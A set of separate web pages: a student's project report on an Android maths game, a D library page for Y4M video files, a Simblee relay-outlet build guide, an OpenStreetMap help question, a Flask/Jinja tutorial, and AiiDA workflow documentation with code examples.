'BuzzBangApp.java' contains a 'Game' object, which keeps track of the current question and current score. Every time the user starts a new game, a new 'BuzzBangApp' object is created.

BuzzBangApp.java
Game.java (section of code from the class)

3.3.2 Connecting the Application to the Database

One of the main requirements of the game is that it can keep track of a user's progress and scores. As seen in section 3.2, Android applications cannot connect directly to a database server; to solve this I needed to create a PHP API which would pass data between the Android application and the database server. In section 3.2, I gave an example of the create_user.php class, which can add a new row to the user_details table. In order to link the application to the database I needed to create a 'NewUserActivity.java' class which would connect to the database through 'create_user.php'. The NewUserActivity.java class receives user data and passes this data on to the create_user.php class. NewUserActivity.java then receives a response stating whether the new user was successfully created or not.

NewUserActivity.java

3.3.3 Creating Screen Layouts

According to the official Android developer guide, "A layout defines the visual structure for a user interface". Android allowed me to design my screens using simple XML files, and it is relatively straightforward to instantiate these screen layouts at runtime and integrate the back-end code with the user interface. Each screen that I created was defined in an XML file; section 3.4 of this report, where screenshots of my project are displayed, demonstrates my implementation of the XML screen layouts.

3.4 Screenshots of my application
[Screenshots of the application omitted: Home Menu, Account Screen, Log-in Screen, Play Screen, Practice Screen, Help Screen, New User Screen]

Chapter 4 Evaluation

4.1 Evaluation of my application

In section 2.8 of this report, I outlined some User Interface guidelines that all mobile applications should follow. These were:

Enable Frequent Users to Use Shortcuts
Offer Informative Feedback
Support Internal Locus of Control
Consistency
Reversal of Actions
Error Prevention and Simple Error Handling
Reduce short-term memory load
Design for multiple and dynamic contexts
Design for Limited and Split Attention
Design for speed and recovery
Allow for personalization
Design for Enjoyment

In this section I will evaluate my own application based on these guidelines.

Enable Frequent Users to Use Shortcuts: The application is quite straightforward to navigate, and the number of operations required by the user to start a game is minimal. There is currently no option to quit in the middle of a game and return to the menu; this is a shortcut which should be added to improve the user experience.

Offer Informative Feedback: The application gives the user feedback at the end of every round, as the user is shown his/her scores immediately. The user also receives feedback in the practice section: if they get a question wrong they are shown the help screen straight away. The statistics screen likewise gives the user feedback on their previous scores.

Support Internal Locus of Control: Users will feel as though they are in charge of the application. The application only responds to the user's actions, giving them full control.

Consistency: Consistency across platforms is not supported, as the application has only been developed for the Android platform.

Reversal of Actions: Reversal of actions is not provided in the test section of the game; this is to stop users from changing their answers if they get a question wrong.
Reversal of action is provided in the practice section. After being shown the help screen, users are brought back to the previous question. Error Prevention and Simple Error Handling: The application will check if the Android device is connected to the internet or has 3G coverage. If the device is not connected, then the user will not be able to log in or create a new user account. The user will instead be brought back to the main menu. Reduce Short-Term Memory Load: The user does not have to memorise much about the application, as long as he/she understands how the game works. Design for Multiple and Dynamic Contexts: Even if users get distracted while playing a game, they will be able to return to the question they were on. Design for Limited and Split Attention: The application's interface does require a lot of attention while playing, as there are a number of different numbers and answers that need to be considered. The interface could be improved, to make it a more intuitive game. Design for Speed and Recovery: At the moment, the user's details are only updated after every round. If the user's game is interrupted suddenly, the user's progress will not have been saved. Allow for Personalisation: The application does not have different preferences available for different users to choose from. It does allow for users of different skill levels. Design for Enjoyment: While the colour scheme of the game screen is bright, overall the application needs more work on the aesthetics of the screens.

4.2 Evaluation of the FYP process

Overall, I found the Final Year Project quite challenging. From the amount of research that was involved, deciding which technologies to use and learning how to use them, the design and implementation of the software, and documenting my work in a report, the project was a huge workload.
However, looking back on the whole process, there are some things that I feel I could have managed better, which would have resulted in an improved performance and end product. I spent the first two to three months doing research on different aspects of education, learning styles and mathematics. I also completed some basic Android development online tutorials in this time. My primary focus, though, was on education-based research. While this was very important, I should have put more time into Android development. The tutorials I completed gave me a good foundation in Android development, but they did not prepare me for some of the more technical issues I faced during development of the application (server-side issues). If I had come across these issues earlier in the FYP process, I would have been better equipped when I began development of the application. I felt that I had a good relationship with my FYP supervisor. After any of our meetings I always knew what parts of the project needed to be improved, and what I should focus my time on. On reflection, I should have kept him informed of any progress I was making more often than I did. The FYP process was successful in getting me to work throughout the year. Having various deadlines for presentations, interim reports, etc., helped me to focus and start work earlier than I would otherwise have done.

Chapter 5 Achievements and conclusion

5.1 Summary of achievements

I feel that I achieved a great deal by working on this project. It was by far the largest, most difficult project I have attempted to complete. I developed a range of skills during the course of the project which had not been covered in my Computer Systems course. My research skills improved a lot, and I learned the importance of basing design decisions on established findings. Having had no interest in the topic before the FYP, I found the research into various educational topics quite interesting.
I think that the area of ICT in education is going to grow and grow in the coming years. I developed my programming skills during the implementation of my application. Even though I had no previous experience of Android development, I found that the skills I had developed in my course made the switch to Android development much easier. I learned several new technical skills while working on my FYP, which will benefit me in the future. The experience I gained from setting up a database server, then connecting it to an Android device using the PHP API that I created, was excellent. A major achievement from the FYP was having a working version of my application to show to people on demo day. Some of the feedback I got during the demo day was really nice to hear.

5.2 Future Work

There are a number of areas that I believe could improve the application. I intend to implement the following changes over the summer and put the application up on the Google Play store:

- Add an instructions section to the app that explains how the game works
- Improve the help screen of the practice section so that it emphasises step-counting techniques rather than showing the times table
- Add a classroom feature so that teachers could monitor their students' progress
- Fix any remaining problems regarding updating the database
- Design a more intuitive game screen so that the game feels nicer to play
- Design a suitable version of the application for tablets
https://www.ukessays.com/essays/computer-science/teach-me-maths-android-application-computer-science-essay.php
y4m-d 1.0.1

File loader/emitter for Y4M, a convenient uncompressed video format. To use this package, put the following dependency into your project's dependencies section:

What's this?

y4m-d is a tiny library to load/save Y4M video files. Y4M files are the simplest uncompressed video files that also contain meta-data (width, height, chroma subsampling, etc...), which makes them a better solution than .yuv files. High bit-depths are supported, with any depth from 8 to 16 bits/sample. However, y4m-d does not handle endianness or shifted bits in samples. Frames are read/written as is. libavformat uses native endian for both reading and writing and aligns significant bits to the left. This means the Y4M format depends on the producer machine. So until probing is implemented, it's up to you to take care of this.

Licenses

See UNLICENSE.txt

Usage

    import std.stdio;
    import y4md;

    void main(string[] args)
    {
        auto inputFile = "input-file.y4m";
        auto input = new Y4MReader(inputFile);
        writefln("Input: %s %sx%s %sfps %s bits/sample",
                 inputFile, input.width, input.height,
                 cast(double)(input.framerate.num) / (input.framerate.denom),
                 input.bitdepth);

        ubyte[] frameBytes;
        while ( (frameBytes = input.readFrame()) !is null)
        {
            // Do something with frame data in frameBytes[]
        }

        // Output a 1920x1080p25 8-bit stream to stdout
        auto output = new Y4MWriter(stdout, 1920, 1080, Rational(25, 1), 8);
        frameBytes = new ubyte[output.frameSize()];
        for (int i = 0; i < 100; ++i)
        {
            // write something into frameBytes...
            output.writeFrame(frameBytes[]);
        }
    }

Registered by ponce. Version 1.0.1. Repository: p0nce/y4m-d (github.com/p0nce/y4m-d/), public domain.
https://code.dlang.org/packages/y4m-d
Step 1: Simblee App, Arduino IDE, and Driver Setup

Step 2: Create Simblee Application

This is the heart of this project, a mobile device app programmed on the Simblee. The following is the code for creating a user interface to control the Simblee IO pin.

Include the SimbleeForMobile.h Library

    #include <SimbleeForMobile.h>

Define Relay Pin

The pin numbering on the Simblee breakout is 0-6. I recommend using one of 2-6, as 0 and 1 are used for the serial port.

    #define RELAY_PIN 4

Create a Global ID Variable

We will need a place to store the ID of the switch object in the user interface. It needs to be of global scope.

    int switchID;

Setup

Set up the RELAY_PIN for digital output and start the SimbleeForMobile library using the begin() function, a very important step!

    void setup() {
      pinMode(RELAY_PIN, OUTPUT);
      SimbleeForMobile.begin();
    }

Loop

The Simblee loop() routine is very different from what we are used to seeing with Arduino programs. The SimbleeForMobile library uses callbacks to execute various parts of the program, and the only required code is to call the process() function every time through the loop(). Placing additional code in the loop will not break this, but it may slow down the responsiveness of the app. Especially avoid long delay() calls.

    void loop() {
      SimbleeForMobile.process();
    }

User Interface

Now we program the UI. The entire ui() routine is bookended by the beginScreen and endScreen functions. Everything placed between these will be drawn on our screen. This app uses only two elements, text and a switch. The text will simply serve as a label for the switch, and the switch will control the IO pin.

    void ui() {
      SimbleeForMobile.beginScreen();
      SimbleeForMobile.drawText(70, 160, "OUTLET", BLACK, 24);
      switchID = SimbleeForMobile.drawSwitch(200, 160);
      SimbleeForMobile.endScreen();
    }

The parameters for the text are: (x_origin, y_origin, display string, color, size). The parameters for the switch are: (x_origin, y_origin).
The call to drawSwitch() returns the ID of that UI element, which is why we created the switchID variable.

Connect the UI to the IO

Finally, we can connect the user interface, specifically the switch, to the IO pin on the Simblee. This is achieved with the ui_event function. When the user toggles the switch on the screen, an "event" is triggered and the switchID is passed into this function. An "if" structure determines if the ID of the event that happened is the same as the switchID, and then toggles the IO pin to reflect the value of the switch, 1 or 0.

    void ui_event(event_t &event) {
      if (event.id == switchID) {
        digitalWrite(RELAY_PIN, event.value);
      }
    }

The source code Arduino file is available in the files section of this project.

Step 3: Modify and Assemble Beefcake Relay Kit

The SparkFun Beefcake Relay Kit comes as a ready-to-build kit. You can solder everything in place with the exception of one of the resistors. The kit uses a 2N3904 NPN transistor to take the low-current, 5V control pin voltage and trigger a much higher current for flipping the mechanical relay. The 2N3904 requires 5mA on the base pin to drive the transistor into saturation (fully open) mode. So for a 5V control voltage, the Beefcake relay kit places a 1k resistor on the base of the transistor, and using Ohm's law, I = V / R = 5 V / 1 kΩ = 5 mA. The only problem for us is that the Simblee is a 3.3V device. Using the same math as above, we see that the max current that the base of the transistor will get is 3.3mA. This results in very sporadic behavior on the relay. So we need to get that current up by replacing the 1k resistor with something smaller. Back to Ohm's law: R = V / I = 3.3 V / 5 mA = 660 Ω. Something very close to this value will work, a 680 for instance. Don't go too small, though. The Simblee is a very low current device, rated for 5mA per pin and 15mA across all pins at any given time. Now go ahead and get the soldering iron hot. Some of those big pins on the relay will take some time to heat up; be patient.
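The resistor sizing above is plain Ohm's-law arithmetic, and it is easy to sanity-check. A quick sketch using the values from the text (and, like the text, ignoring the ~0.7 V base-emitter drop):

```python
def base_current(v_ctrl, r_base):
    """Base current through the resistor, I = V / R (simplified model)."""
    return v_ctrl / r_base

# Stock 1k resistor: fine at 5 V, too little current at 3.3 V.
i_stock_5v = base_current(5.0, 1000.0)    # 0.005 A  = 5 mA, saturates the 2N3904
i_stock_3v3 = base_current(3.3, 1000.0)   # 0.0033 A = 3.3 mA -> flaky relay

# Resistor that restores 5 mA of base current from a 3.3 V pin:
r_needed = 3.3 / 0.005  # 660 ohms; 680 is the nearest standard value
```

This confirms why the 680 Ω replacement works: it brings the base current back to roughly the 5 mA the transistor needs, while staying within the Simblee's 5 mA per-pin rating.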
Pay close attention to the placement of the diode, too. Direction definitely matters with those. This picture shows the 680 ohm resistor farthest from the relay body.

Step 4: Wire Relay and Outlet

See the SparkFun tutorial for this bit.

Step 5: Put It All Together

Assemble the Simblee, battery pack, 3.3V regulator, capacitor, and relay as follows:

- The battery connects to the vertical rails shown on the left of the breadboard. VCC to red, GND to black.
- The bypass capacitor is in parallel with the battery, connected to both VCC and GND. Orientation matters for electrolytic caps! (The black stripe is GND.)
- Check the datasheet for the voltage regulator you select; the one I used from SparkFun has the middle pin as the 3.3V output (Vout). This is the yellow wire.
- Power the Simblee with the 3.3V wire (NOT battery VCC) and GND to GND.
- Connect the relay voltage pins to the battery rails and the control line (white wire) to GPIO 4 on the Simblee.

Note: I don't show the relay connected to the outlet in this picture; follow the SparkFun tutorial for that part!

Step 6: Put It In a Box

Step 7: Use It!
https://hackaday.io/project/10694/instructions
(converted from an "answer" to importing-maps-to-basecamp-mac to a new "question")

Hi guys, I have been trying for days to import a topo map (Topohispania = topo of Spain) into my BaseCamp (Mac OS X El Capitan). I download it but it does not show up in either MapManager or BaseCamp. I also tried to change the filename from .gmapi to .gmap, but that does not help. It seems to import but does not show up.

asked 20 Jan '18, 19:26 Gasvikingo

converted to question 20 Jan '18, 23:49 aseerel4c26

Comment: Did importing maps work before? Where did you download the topo map? How did you try to import it (which steps/actions)? This page gives a few hints that may help:
https://help.openstreetmap.org/questions/61740/trying-to-import-a-topomap-into-basecamp-mac-osx-but-it-does-not-show-up
Welcome to a Flask tutorial covering a bit more about Jinja. We covered more of the Jinja basics earlier in this tutorial. This tutorial is a quick overview of the points I find to be most important from the Jinja documentation that I have not yet covered in the earlier tutorials. Just like I recommend scrolling through the Bootstrap documentation once in a while, you should do the same here.

First on our docket: filters. I find myself using these very often. These are very similar to your str(), int(), and replace() commands in Python. For example, let's build a quick new page to run our Jinja samples through:

__init__.py

    @app.route('/jinjaman/')
    def jinjaman():
        try:
            return render_template("jinja-templating.html")
        except Exception as e:
            return str(e)

Great, now we need the template:

templates/jinja-templating.html

    {% extends "header.html" %}
    {% block body %}
    <body class="body">
    <div class="container">
    </div>
    </body>
    {% endblock %}

This will be our start. Next, let's pass a few vars from our __init__.py file.

    @app.route('/jinjaman/')
    def jinjaman():
        try:
            data = [15, '15', 'Python is good',
                    'Python, Java, php, SQL, C++',
                    '<p><strong>Hey there!</strong></p>']
            return render_template("jinja-templating.html", data=data)
        except Exception as e:
            return str(e)

Next, let's reference this data in our templates/jinja-templating.html file:

    {% extends "header.html" %}
    {% block body %}
    <body class="body">
    <div class="container">
      {% for d in data %}
        <p>{{ d }}</p>
      {% endfor %}
      <hr>
      {% if data[1]|int > 10 %}
        <p>True!</p>
      {% endif %}
      <hr>
      <p>{{ data[2]|replace('good', 'FREAKIN AWESOME!') }}</p>
      <hr>
      {% for lang in data[3].split(',') %}
        <p>{{ lang }}</p>
      {% endfor %}
      <hr>
      {{ data[4]|safe }}
    </div>
    </body>
    {% endblock %}

Sometimes, you may want to display raw Jinja code. You can do this with the raw tag, like so:

    {% raw %}
    {% for item in seq %}
        {{ item }}
    {% endfor %}
    {% endraw %}

Next up, I would like to draw your attention to macros.
    {% macro input(name, value='', type='text', size=20) -%}
        <input type="{{ type }}" name="{{ name }}" value="{{ value|e }}" size="{{ size }}">
    {%- endmacro %}

The macro can then be called like a function in the namespace:

    <p>{{ input('username') }}</p>
    <p>{{ input('password', type='password') }}</p>

Next up, we're going to be discussing how to create dynamic links, which are called converters in Flask.
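Since Jinja filters mirror plain Python string and integer operations, you can reason about them with a quick stdlib-only sketch (no Flask needed; the data list matches the one passed from __init__.py above):

```python
data = [15, '15', 'Python is good',
        'Python, Java, php, SQL, C++',
        '<p><strong>Hey there!</strong></p>']

# {% if data[1]|int > 10 %} is just int() plus a comparison
assert int(data[1]) > 10

# {{ data[2]|replace('good', '...') }} is str.replace
assert data[2].replace('good', 'FREAKIN AWESOME!') == 'Python is FREAKIN AWESOME!'

# {% for lang in data[3].split(',') %} is str.split
langs = [lang.strip() for lang in data[3].split(',')]
```

This parallel is a handy mental model: if you know what the Python builtin does, you know what the filter does.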
https://pythonprogramming.net/jinja-template-flask-tutorial/
Usage¶

Note: This chapter assumes that the basic concepts of work functions and work chains, the differences between them, and when one should use one or the other, are known.

A workflow in AiiDA is a process (see the process section for details) that calls other workflows and calculations and optionally returns data, and as such can encode the logic of a typical scientific workflow. Currently, there are two ways of implementing a workflow process: This section will provide detailed information and best practices on how to implement these two workflow types.

Work functions¶

The concept of work functions and the basic rules of implementation are documented in detail elsewhere: Since work functions are a sub type of process functions, just like calculation functions, their implementation rules are practically identical. However, their intended aim and heuristics are very different. Where calculation functions are 'calculation'-like processes that create new data, work functions behave like 'workflow'-like processes and can only return data. What this entails in terms of intended usage and limitations for work functions is the scope of this section.

Returning data¶

It has been said many times before: work functions, like all 'workflow'-like processes, return data, but what does return mean exactly? In this context, the term 'return' is not intended to refer to a piece of python code returning a value. Instead it refers to a workflow process recording a data node as one of its outputs, that it itself did not create, but which rather was created by some other process that was called by the workflow. The calculation process was responsible for creating the data node and the workflow is merely returning it as one of its outputs. This is then exactly what the workfunction function does. It takes one or more data nodes as inputs, calls other processes to which it passes those inputs, and optionally returns some or all of the outputs created by the calculation processes it called.
As explained in the technical section, outputs are recorded as 'returned' nodes simply by returning the nodes from the function. The engine will inspect the return value from the function and attach the output nodes to the node that represents the work function. To verify that the output nodes are in fact not 'created', the engine will check that the nodes are stored. Therefore, it is very important that you do not store the nodes you create yourself, or the engine will raise an exception, as shown in the following example:

    # -*- coding: utf-8 -*-
    from aiida.engine import workfunction
    from aiida.orm import Int

    @workfunction
    def illegal_workfunction(x, y):
        return Int(x + y)

    result = illegal_workfunction(Int(1), Int(2))

Because the returned node is a newly created node and not stored, the engine will raise the following exception:

    ValueError: Workflow<illegal_workfunction> tried returning an unstored `Data` node. This likely means new `Data` is being created inside the workflow. In order to preserve data provenance, use a `calcfunction` to create this node and return its output from the workflow

Note that you could of course circumvent this check by calling store yourself on the node, but that misses the point. The problem with using a workfunction to 'create' new data is that the provenance is lost. To illustrate this problem, let's go back to the simple problem of implementing a workflow to add two integers and multiply the result with a third. The correct implementation has a resulting provenance graph that clearly captures the addition and the multiplication as separate calculation nodes, as shown in Fig. 15.
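The stored-node check the engine performs can be mimicked with a toy model. The following is purely illustrative plain Python (not AiiDA's actual classes) showing why an unstored return value is rejected:

```python
class Data:
    """Toy data node with a stored flag, loosely mimicking an aiida.orm node."""
    def __init__(self, value):
        self.value = value
        self._stored = False

    def store(self):
        self._stored = True
        return self

def workfunction(func):
    """Toy decorator: reject return values that were not already stored,
    i.e. data the workflow 'created' itself instead of a calculation."""
    def wrapper(*args):
        result = func(*args)
        if not result._stored:
            raise ValueError('workfunction tried returning an unstored node')
        return result
    return wrapper

@workfunction
def illegal(x, y):
    return Data(x.value + y.value)  # new, unstored node -> rejected

@workfunction
def legal(x, y):
    # Pretend a calcfunction created and stored this node for us.
    return Data(x.value + y.value).store()
```

The real engine's check works on the same principle: a stored node must have come from somewhere else in the provenance graph, while an unstored one was just created out of thin air by the workflow.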
To illustrate what would happen if one does not call calculation functions to perform the computations, but instead performs them directly in the work function itself and returns the result, consider the following example:

    # -*- coding: utf-8 -*-
    from aiida.engine import calcfunction, workfunction
    from aiida.orm import Int

    @workfunction
    def add_and_multiply(x, y, z):
        sum = Int(x + y)
        product = Int(sum * z)
        return product.store()

Note that in this example implementation we explicitly had to call store on the result before returning it to avoid the exception thrown by the engine. The resulting provenance would look like the following: However, looking at the generated provenance shows exactly why we shouldn't. This faulty implementation loses provenance, as it has no explicit representations of the addition and the multiplication, and the result node does not have a create link, which means that if only the data provenance is followed, it is as if it appears out of thin air! Compare this to the provenance graph of Fig. 15, which was generated by a solution that correctly uses calculation functions to perform the computations. In this trivial example, one may think that this loss of information is not so important, because it is implicitly captured by the workflow node. But a halfway solution may make the problem more apparent, as demonstrated by the following snippet, where the addition is properly done by calling a calculation function, but the final product is still computed by the work function itself:

    # -*- coding: utf-8 -*-
    from aiida.engine import calcfunction, workfunction
    from aiida.orm import Int

    @calcfunction
    def add(x, y):
        return Int(x + y)

    @workfunction
    def add_and_multiply(x, y, z):
        sum = add(x, y)
        product = Int(sum * z)
        return product.store()

This time around the addition is correctly performed by a calculation function, as it should be; however, its result is multiplied by the work function itself and returned.
Note that once again store had to be called explicitly on product to avoid the engine throwing a ValueError, which is only for the purpose of this example and should not be done in practice. The resulting provenance would look like the following: The generated provenance shows that, although the addition is explicitly represented because the work function called the calculation function, there is no connection between the sum and the final result. That is to say, there is no direct link between the sum D4 and the final result D5, as indicated by the red cross, even though we know that the final answer was based on the intermediate sum. This is a direct cause of the work function 'creating' new data and illustrates how, in doing so, the provenance of data creation is lost.

Exit codes¶

To terminate the execution of a work function and mark it as failed, one simply has to return an exit code. The ExitCode class is constructed with an integer, to denote the desired exit status, and an optional message. When such an exit code is returned, the engine will mark the node of the work function as Finished and set the exit status and message to the value of the exit code. Consider the following example:

    @workfunction
    def exiting_workfunction():
        from aiida.engine import ExitCode
        return ExitCode(418, 'I am a teapot')

The execution of the work function will be immediately terminated as soon as the exit code is returned, and the exit status and message will be set to 418 and I am a teapot, respectively. Since no output nodes are returned, the WorkFunctionNode node will have no outputs and the value returned from the function call will be an empty dictionary.

Work chains¶

The basic concept of the work chain has been explained elsewhere. This section will provide details on how a work chain can and should be implemented. A work chain is implemented by the WorkChain class. Since it is a sub class of the Process class, it shares all its properties.
It will be very valuable to have read the section on working with generic processes before continuing, because all the concepts explained there will apply also to work chains. Let's continue with the example presented in the section on the concept of work chains, where we sum two integers and multiply the result with a third. We provided a very simple implementation in a code snippet, whose generated provenance graph, when executed, is shown in Fig. 19. For convenience we copy the snippet here once more:

    # -*- coding: utf-8 -*-
    from aiida.engine import WorkChain, calcfunction
    from aiida.orm import Int

    @calcfunction
    def addition(x, y):
        return Int(x + y)

    @calcfunction
    def multiplication(x, y):
        return Int(x * y)

    class AddAndMultiplyWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.input('x')
            spec.input('y')
            spec.input('z')
            spec.outline(
                cls.add,
                cls.multiply,
                cls.results,
            )
            spec.output('result')

        def add(self):
            self.ctx.sum = addition(self.inputs.x, self.inputs.y)

        def multiply(self):
            self.ctx.product = multiplication(self.ctx.sum, self.inputs.z)

        def results(self):
            self.out('result', self.ctx.product)

We will now go through the implementation step-by-step and go into more detail on the interface and best practices.

Definition¶

To implement a new work chain, simply create a new class that sub classes WorkChain. You can give the new class any valid python class name, but the convention is to have it end in WorkChain, so that it is always immediately clear what it references. After having created a new work chain class, the first and most important method to implement is the define() method. This is a class method that allows the developer to define the characteristics of the work chain, such as what inputs it takes, what outputs it can generate, what potential exit codes it can return, and the logical outline through which it will accomplish all this. To implement the define method, you have to start with the following three lines:

    @classmethod
    def define(cls, spec):
        super().define(spec)

where you replace AddAndMultiplyWorkChain with the actual name of your work chain. The @classmethod decorator indicates that this method is a class method and not an instance method. The second line is the method signature and specifies that the method will receive the class itself, cls, and spec, which will be an instance of the ProcessSpec. This is the object that we will use to define our inputs, outputs and other relevant properties of the work chain. The third and final line is extremely important, as it will call the define method of the parent class, in this case the WorkChain class.
Warning: If you forget to call super in the define method, your work chain will fail miserably!

Inputs and outputs¶

With those formalities out of the way, you can start defining the interesting properties of the work chain through the spec. In the example you can see how the method input() is used to define multiple input ports, which document exactly which inputs the work chain expects. Similarly, output() is called to instruct that the work chain will produce an output with the label result. These two port creation methods support a lot more functionality, such as adding help strings, validation and more, all of which is documented in detail in the section on ports and port namespaces.

Outline¶

The outline is what sets the work chain apart from other processes. It is a way of defining the higher-level logic that encodes the workflow that the work chain executes. The outline is defined in the define method through the outline() method. It takes a sequence of instructions that the work chain will execute, each of which is implemented as a method of the work chain class. In the simple example above, the outline consists of three simple instructions: add, multiply, results. Since these are implemented as instance methods, they are prefixed with cls. to indicate that they are in fact methods of the work chain class. For that same reason, their implementation should take self as its one and only argument, as demonstrated in the example snippet. The outline in this simple example is not particularly interesting, as it consists of three simple instructions that will be executed sequentially. However, the outline also supports various logical constructs, such as while-loops, conditionals and return statements. As usual, the best way to illustrate these constructs is by example.
The currently available logical constructs for the work chain outline are:

- if, elif, else
- while
- return

To distinguish these constructs from the python builtins, they are suffixed with an underscore, like so: while_. To use these in your work chain design, you will have to import them:

    from aiida.engine import if_, while_, return_

Note how the syntax of these constructs looks very much like normal python syntax. The methods that are used in the conditionals (between the parentheses of the while_ and if_ constructs), for example, should return a boolean: True when the condition holds and False otherwise. A well designed outline should give the reader an immediate idea of what the work chain does and how it does it. One should not have to look at the implementation of the outline steps, as all the important information is captured by the outline itself. Since the goal of a work chain should be to execute a well defined task, the outline should capture the required logic in a clear and concise manner.

Exit codes¶

There is one more property of a work chain that is specified through its process specification, in addition to its inputs, outputs and outline. Any work chain may have one or more failure modes, which are modelled by exit codes. A work chain can be stopped at any time, simply by returning an exit code from an outline method. To retrieve an exit code that is defined on the spec, one can use the exit_codes() property. This returns an attribute dictionary where the exit code labels map to their corresponding exit code. For example, with the following process spec:

    spec = ProcessSpec()
    spec.exit_code(418, 'ERROR_I_AM_A_TEAPOT', 'the process had an identity crisis')

the corresponding exit code can then be retrieved within the work chain as self.exit_codes.ERROR_I_AM_A_TEAPOT. To see how exit codes can be used to terminate the execution of work chains gracefully, refer to the section Aborting and exit codes.

Launching work chains¶

The rules for launching work chains are the same as those for any other process, which are detailed in this section. On top of those basic rules, there is one peculiarity in the case of work chains when submitting to the daemon.
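To get a feel for how such an outline DSL can be built, here is a toy re-implementation of while_ and if_ as plain Python closures. This is purely illustrative and not how AiiDA's engine actually works (the real engine persists state between steps, among many other things):

```python
def while_(condition):
    """Toy while_: returns a constructor that captures the body steps."""
    def capture(*steps):
        def run(ctx):
            while condition(ctx):
                for step in steps:
                    step(ctx)
        return run
    return capture

def if_(condition):
    """Toy if_: run the captured steps only when the condition holds."""
    def capture(*steps):
        def run(ctx):
            if condition(ctx):
                for step in steps:
                    step(ctx)
        return run
    return capture

# A tiny 'outline': keep doubling ctx['n'] while it is below 100,
# then record whether we landed exactly on 128.
outline = [
    while_(lambda ctx: ctx['n'] < 100)(
        lambda ctx: ctx.update(n=ctx['n'] * 2),
    ),
    if_(lambda ctx: ctx['n'] == 128)(
        lambda ctx: ctx.update(hit=True),
    ),
]

ctx = {'n': 1}
for instruction in outline:
    instruction(ctx)
# ctx['n'] is now 128 and ctx['hit'] is True
```

The key design idea, shared with the real outline, is that the conditions and bodies are stored as callables and only evaluated when the 'engine' runs the outline, which is what makes the declarative spec possible.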
When you submit a WorkChain over the daemon, or any other process for that matter, you need to make sure that the daemon can find the class that defines it, i.e. the work chain needs to be importable in the daemon's environment. Additionally, make sure that the definition of the work chain is not in the same file from which you submit it, or the engine won't be able to load it.

Context¶

In the simplest work chain example presented in the introductory section, we already saw how the context can be used to persist information during the execution of a work chain and pass it between outline steps. The context is essentially a data container, very similar to a dictionary, that can hold all sorts of data. The engine will persist the contents of the context between outline steps, which is what allows data to be passed from one step to the next.

Warning: Any data that is stored in the context has to be serializable.

This was just a simple example to introduce the concept of the context; however, it really is one of the more important parts of the work chain. The context really becomes crucial when you want to submit a calculation or another work chain from within the work chain. How this is accomplished, we will show in the next section.

Submitting sub processes¶

One of the main tasks of a WorkChain will be to launch other processes, such as a CalcJob or another WorkChain. How to submit processes was explained in another section and is accomplished by using the submit() launch function. However, when submitting a sub process from within a work chain, this should not be used. If you do, you will be greeted with the exception:

    InvalidOperation: 'Cannot use top-level `submit` from within another process, use `self.submit` instead'

Instead, the Process class provides its own submit() method. The only change you have to make is to replace the top-level submit method with the built-in method of the process class:

    def submit_sub_process(self):
        node = self.submit(SomeProcess, **inputs)  # Here we use `self.submit` and not `submit` from `aiida.engine`
        return ToContext(sub_process=node)

The self.submit method has the exact same interface as the global aiida.engine.launch.submit launcher.
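The future-like behaviour of the node returned by self.submit can be illustrated with a toy model (plain Python, not AiiDA; the names Future, submit and resolve here are invented for the illustration):

```python
class Future:
    """Toy future: a placeholder that is resolved later by the 'engine'."""
    def __init__(self):
        self.done = False
        self.result = None

    def resolve(self, result):
        self.done = True
        self.result = result

def submit(work):
    """Toy submit: returns immediately with an unresolved future,
    before the work has actually been executed."""
    future = Future()
    return future, work

future, work = submit(lambda: 42)
assert not future.done   # submit returns before the work is done
future.resolve(work())   # the 'engine' completes the work later
```

This is the essence of why the work chain must hand control back to the engine: the value you get back from submit is only a handle, and something else has to run the work and resolve it.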
When the submit method is called, the process is created and submitted to the daemon, but at that point it is not yet done. So the value that is returned by the submit call is not the result of the submitted process; rather, it is the process node that represents the execution of the process in the provenance graph and acts as a future. We somehow need to tell the work chain that it should wait for the sub process to be finished, and the future to resolve, before it continues. To do so, however, control has to be returned to the engine, which can then, when the process is completed, call the next step in the outline, where we can analyse the results. The snippet above already revealed that this is accomplished by returning an instance of the ToContext class.

To context¶

In order to store the future of the submitted process, we can store it in the context with a special construct that will tell the engine that it should wait for that process to finish before continuing the work chain. To illustrate how this works, consider the following minimal example:

    # -*- coding: utf-8 -*-
    from aiida.engine import WorkChain, ToContext

    class SomeWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.outline(
                cls.submit_workchain,
                cls.inspect_workchain,
            )

        def submit_workchain(self):
            future = self.submit(SomeWorkChain)
            return ToContext(workchain=future)

        def inspect_workchain(self):
            assert self.ctx.workchain.is_finished

By returning an instance of ToContext from the outline step, the engine knows that it should wait for the submitted process to finish. Once it has, its node is stored in the context under the key that was used in the ToContext construct, and the next outline step is called. At that point the sub process, the work chain in this case, has terminated its execution, although not necessarily successfully, and we can continue the logic of the work chain.

Warning: Using the ToContext construct alone is not enough to tell the engine that it should wait for the sub process to finish. There needs to be at least another step in the outline to follow the step that added the awaitables. If there is no more step to follow, according to the outline, the engine interprets this as the work chain being done and so it will not wait for the sub process to finish. Think about it like this: if there is not even a single step to follow, there is also nothing the work chain could do with the results of the sub process, so there is no point in waiting.
Sometimes one wants to launch not just one, but multiple processes at the same time that can run in parallel. With the mechanism described above, this will not be possible, since after submitting a single process and returning the ToContext instance, the work chain has to wait for the process to be finished before it can continue. To solve this problem, there is another way to add futures to the context:

    # -*- coding: utf-8 -*-
    from aiida.engine import WorkChain

    class SomeWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.outline(
                cls.submit_workchains,
                cls.inspect_workchains,
            )

        def submit_workchains(self):
            for i in range(3):
                future = self.submit(SomeWorkChain)
                key = f'workchain_{i}'
                self.to_context(**{key: future})

        def inspect_workchains(self):
            for i in range(3):
                key = f'workchain_{i}'
                assert self.ctx[key].is_finished_ok

Here we submit three work chains. When the submit_workchains step returns, the engine will find the futures that were added by calling to_context and will wait for all of them to be finished. The good thing here is that these three sub work chains can be run in parallel and, once all of them are done, the parent work chain will go to the next step, which is inspect_workchains. There we can find the nodes of the work chains in the context, under the keys with which they were stored. Instead of assigning each future to its own key, one can also append the futures to a list in the context using the append_ construct, as in the following example, where we again submit three work chains:

    # -*- coding: utf-8 -*-
    from aiida.engine import WorkChain, append_

    class SomeWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.outline(
                cls.submit_workchains,
                cls.inspect_workchains,
            )

        def submit_workchains(self):
            for i in range(3):
                future = self.submit(SomeWorkChain)
                self.to_context(workchains=append_(future))

        def inspect_workchains(self):
            for workchain in self.ctx.workchains:
